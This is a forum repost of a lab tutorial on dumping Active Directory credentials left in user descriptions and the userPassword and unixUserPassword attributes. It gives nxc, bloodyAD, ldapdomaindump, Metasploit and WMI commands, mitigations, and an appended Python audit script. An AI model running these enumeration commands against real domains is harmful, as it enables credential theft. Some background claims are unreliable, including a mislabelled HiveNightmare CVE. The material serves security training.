
Credential Dumping: AD User Comment

geebee

Marketing Strategist
G Rep
0
0
0
Rep
0
G Vouches
0
0
0
Vouches
0
Posts
109
Likes
53
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
In this article, we shall explore different tools and techniques that help us enumerate Active Directory (AD) users’ passwords, which an attacker can then use to expand their access within the organization.

Several critical vulnerabilities in Active Directory (AD) and related services can lead to exposure of password-related information stored in the UserPassword, UnixUserPassword, unicodePwd and msSFU30Password attributes. Exploiting these flaws allows attackers to access password hashes or even cleartext passwords, thereby significantly increasing the risk of unauthorized access to systems and data. Key attack paths include privilege escalation, improper access control configurations and vulnerabilities in network protocols like SMB or RDP that enable attackers to intercept or access sensitive fields. Notable CVEs that enable such exploits include CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare) and CVE-2019-0708 (BlueKeep), all of which, if exploited, can lead to unauthorized access to critical password fields in AD.

Table of Contents
  • Understanding of Active Directory (AD) password attributes
  • Prerequisites
  • Lab Setup
  • Exploitation
    • nxc
    • bloodyAD
    • ldapdomaindump
    • MetaSploit
    • Get-WmiObject
  • Mitigation

Understanding of Active Directory (AD) password attributes

UserPassword: In Active Directory, the UserPassword field typically refers to the password hash stored for users (NTLM or sometimes Kerberos hashes). These hashes are used to authenticate users without directly storing plaintext passwords. If attackers gain access to these hashes, they can perform offline attacks (e.g., brute force or dictionary attacks) to try to recover the original passwords.

UnixUserPassword: This field is used when integrating Active Directory with Unix/Linux systems (using services like or nsswitch.conf for user authentication). It stores the password hash for Unix-based systems, which is usually in a different format (e.g., DES, SHA-512) than Windows hashes.

unicodePwd: The unicodePwd attribute in Active Directory holds the password for a user in Unicode format (UTF-16). This field is used by AD when passwords are being set or updated. In a typical AD deployment, this field would not be readable directly through normal LDAP queries due to security restrictions.

msSFU30Password: The msSFU30Password attribute is associated with the Microsoft Services for Unix (SFU) integration. This field stores passwords used in Unix environments but integrated into Active Directory, similar to the unixUserPassword attribute. If a system uses SFU, this field will store the password hash in a Unix-compatible format.

Prerequisites
  • Windows Server 2019 as Active Directory Domain Controller
  • Tools: nxc, bloodyAD, ldapdomaindump, MetaSploit, Get-WmiObject utility
  • Kali Linux
  • Windows 10/11 – As Client/Attacker Machine

Lab Setup

In this lab setup, we will create an AD user, add a user description that contains the user’s password, and provide passwords in the “userPassword” and “unixUserPassword” attributes.

Create the AD Environment

To simulate an Active Directory environment, you will need a Windows Server 2019 as a Domain Controller (DC) and a client/attacker machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller

  • Install Windows Server (2016 or 2019 recommended).
  • Promote it to a Domain Controller by adding the “Active Directory Domain Services” role.
  • Set up the domain (e.g., “local”).
  • Create a domain user with username “raj” and password “Password@1”.

Create an AD user and provide user description

Once the AD environment is set up, open PowerShell in Administrative mode on the Windows Server and run the below two commands to set the “description” attribute of the user “divya” so that it contains the password.

Code:
Import-Module ActiveDirectory
Set-ADUser -Identity "divya" -Description "this is a default password =Password@123"

1.png


Using the “Get-ADUser” utility and a command like the one below, we can confirm that a user with “divya” as username exists along with the description provided.

Code:
Get-ADUser -Identity "divya" -Properties Description | Select-Object Name, Description

2.png


Then navigate to the “divya” user’s properties window by following the below steps.

Steps

  • Open “Active Directory Users and Computers (ADUC)” on the Domain Controller.
  • Enable the “Advanced Features” view by clicking on “View > Advanced Features”.
  • Locate user “divya” in the “Users” container.
  • Right-click on the “divya” user and go to “Properties”.

3.png


This action opens the “General” tab of the “divya” user’s Properties window, where the “Description” that was added can be viewed and confirmed.

4.png


Update userPassword attribute:

Navigate to the “Attribute Editor” tab within the “divya” user’s properties window, select the “userPassword” attribute and click on the “Edit” button. This action opens the “Multi-valued Octet String Editor” pop-up window. Click on the “Add” button in the newly opened window.

5.png


Provide the “divya” user’s password “Password@123” in its hexadecimal form within the “Value” textarea and click on the “OK” button in the “Octet String Attribute Editor” pop-up window.

6.png


Update unixUserPassword attribute:

Similar to the steps mentioned above in the “Update userPassword attribute” section, one can select the “unixUserPassword” attribute and update its value to “admin@123”.

Select the “unixUserPassword” attribute and click on the “Edit” button. This action opens the “Multi-valued Octet String Editor” pop-up window. Click on the “Add” button in the newly opened window.

7.png


Provide the “divya” user’s Unix password “admin@123” in its hexadecimal form within the “Value” textarea and click on the “OK” button in the “Octet String Attribute Editor” pop-up window.

8.png


Alternatively, one can run the below command from the PowerShell window that was opened in the “Create an AD user and provide user description” section to set the “divya” user’s Unix password to “admin@123”.

Code:
Set-ADUser -Identity "divya" -Replace @{
    uidNumber = 1001;
    gidNumber = 1001;
    unixHomeDirectory = "/home/linux";
    loginShell = "/bin/bash";
    unixUserPassword = "admin@123"
}

11.png


Exploitation

nxc

Run the below command from a Kali Linux root terminal to get the user descriptions stored in Active Directory using the “user-desc” module of the “nxc” tool.

Code:
nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc

12.png


Access the “nxc” tool logs using the below command to revisit the enumerated information at a later time.

Code:
cat /root/.nxc/logs/UserDesc-192.168.1.48-20250120_052352.log

13.png


Run the below commands to further enumerate sensitive information like passwords.

Enumerate AD users’ descriptions, which at times may contain passwords, using the “get-desc-users” module.

Code:
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

14.png


Enumerate the userPassword attribute of all users in LDAP using the “get-userPassword” module.

Code:
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword




Enumerate the unixUserPassword attribute of all users in LDAP using the “get-unixUserPassword” module.

Code:
nxc ldap ignite.local -u raj -p Password@1 -M get-unixUserPassword

16.png


bloodyAD

Run the below command to enumerate all users’ sensitive information that is stored in the “userPassword”, “unixUserPassword”, “unicodePwd” and “description” attributes.

Code:
bloodyAD -u raj -p 'Password@1' -d ignite.local --host 192.168.1.48 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePwd=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description

17.png


The output, containing sensitive information like passwords and the attacks a user is vulnerable to, can be observed in the below screenshot.

18.png


ldapdomaindump

Run the below commands to enumerate complete information about the AD under test, then navigate to the “AD_DUMP” directory and list all the files generated by the “ldapdomaindump” tool.

Code:
ldapdomaindump -u 'ignite.local\raj' -p Password@1 192.168.1.48 -o AD_DUMP
cd AD_DUMP
ls -al

19.png


Now, open the “domain_users.html” file in a browser. Observe that the attacker could enumerate the AD users’ “description” attribute, which gives away a user’s password or the attack technique to which the user is vulnerable.

20.png


MetaSploit

Start the MetaSploit Framework Console from a Kali Linux root terminal.

Use the “ldap_query” auxiliary module, set all required options and run the module to enumerate all AD users’ information.

Code:
use auxiliary/gather/ldap_query
set action ENUM_ACCOUNTS
set rhosts 192.168.1.48
set username raj
set password Password@1
set domain ignite.local
run

21.png


The below output screenshot lists AD users’ information along with the corresponding information stored in the AD “description” attribute.

22.png


Note: Alternatively, we may use the “enum_ad_user_comments” post module to enumerate users’ information along with the information stored in the AD “description” attribute. Below is the list of commands to execute in sequence (this module requires an existing session on a domain-joined host, set here as session 1) and the output screenshot upon running the listed commands from a Kali Linux root terminal.

Code:
use post/windows/gather/enum_ad_user_comments
set session 1
run

23.png


Get-WmiObject

Open PowerShell in Administrative Mode on a Windows client/attacker machine. Then, run the below command to enumerate the name, SID, domain and “description” of the users listed in the command using the “Get-WmiObject” utility.

Code:
Get-WmiObject -Class Win32_UserAccount | Where-Object { $_.Name -in @("raj", "divya") } | Select-Object Name, SID, Domain, Description

24.png


Mitigation

Vulnerabilities like CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare) and CVE-2019-0708 (BlueKeep) show that the UserPassword, UnixUserPassword, unicodePwd and msSFU30Password attributes themselves may not pose a direct threat in all cases. However, there are various attack vectors that can be used to gain the access necessary to retrieve these password-related fields from the Active Directory configuration.

Listed below are the best practices to be followed diligently to reduce the possibility of enumerating AD users’ passwords.

Use Strong Encryption: Ensure that all communications between clients and domain controllers are encrypted (LDAPS, SMB encryption, etc.) to prevent password hashes from being intercepted. Also, disable legacy authentication protocols such as NTLM where possible.

Limit Access to Password Attributes: Use stringent Access Control Lists (ACLs) to restrict access to sensitive attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password to only trusted & limited number of administrators.

Regularly Audit AD Permissions: Regularly review and audit the permissions on AD objects to ensure that only authorized users and groups can access sensitive fields.

Apply Security Patches: Ensure all AD and associated systems (like Unix integrations) are regularly patched to prevent exploitation of known vulnerabilities.

Monitor for Privilege Escalation: Use monitoring & alerting tools and practices to detect suspicious activities such as privilege escalation, lateral movement and/or attempts to dump credentials.
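The “Regularly Audit AD Permissions” item above, and the lab steps that write passwords into the “description”, “userPassword” and “unixUserPassword” attributes, can be checked with a small audit routine. The Python below is an added example and is not from the original article or any of the tools it covers; it runs over constructed user entries shaped like the attribute dictionaries an LDAP search returns (octet-string attributes as bytes, the same bytes whose hex form the ADUC “Octet String Attribute Editor” asks for), and reports which accounts expose a credential without printing the secret itself.

```python
import re

# Constructed sample entries for the example (not real directory data).
# Octet-string attributes are lists of bytes, as an LDAP client returns them.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "divya",
     "description": "this is a default password =Password@123",
     "userPassword": [bytes.fromhex("50617373776f726440313233")],
     "unixUserPassword": [b"admin@123"]},
    {"sAMAccountName": "raj",
     "description": "Domain user",
     "userPassword": [], "unixUserPassword": []},
    {"sAMAccountName": "svc_backup",
     "description": "pwd: S3rv1ce!",
     "userPassword": [], "unixUserPassword": []},
]

# Words that commonly precede a password left in a description field.
PASSWORD_HINT = re.compile(r"\b(pass(word)?|pwd|cred(ential)?s?)\b", re.I)
# Octet-string attributes the article shows being populated with passwords.
OCTET_ATTRS = ("userPassword", "unixUserPassword", "msSFU30Password")


def octet_to_hex(text: str) -> str:
    """Hex form of a string, as typed into the ADUC octet-string editor."""
    return text.encode("utf-8").hex()


def audit_entry(entry: dict) -> list:
    """Return one finding per exposed credential field; secrets are not echoed."""
    findings = []
    desc = entry.get("description") or ""
    if PASSWORD_HINT.search(desc):
        findings.append("description contains a password hint")
    for attr in OCTET_ATTRS:
        for raw in entry.get(attr) or []:
            # Report only that the attribute is set and how long the value is.
            findings.append(f"{attr} is populated ({len(raw)} bytes)")
    return findings


def audit_directory(entries) -> dict:
    """Map each account with at least one finding to its list of findings."""
    report = {}
    for entry in entries:
        hits = audit_entry(entry)
        if hits:
            report[entry["sAMAccountName"]] = hits
    return report


if __name__ == "__main__":
    for account, hits in audit_directory(SAMPLE_ENTRIES).items():
        print(account, "->", "; ".join(hits))
```

To use it against a live domain, replace SAMPLE_ENTRIES with the result of an authenticated LDAP search for the same attributes; accounts that appear in the report need their description cleaned and the octet-string attributes cleared.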

Author: Srikrishna is a Cybersecurity leader driving security excellence and mentoring teams to enhance security across products, networks, and organizations.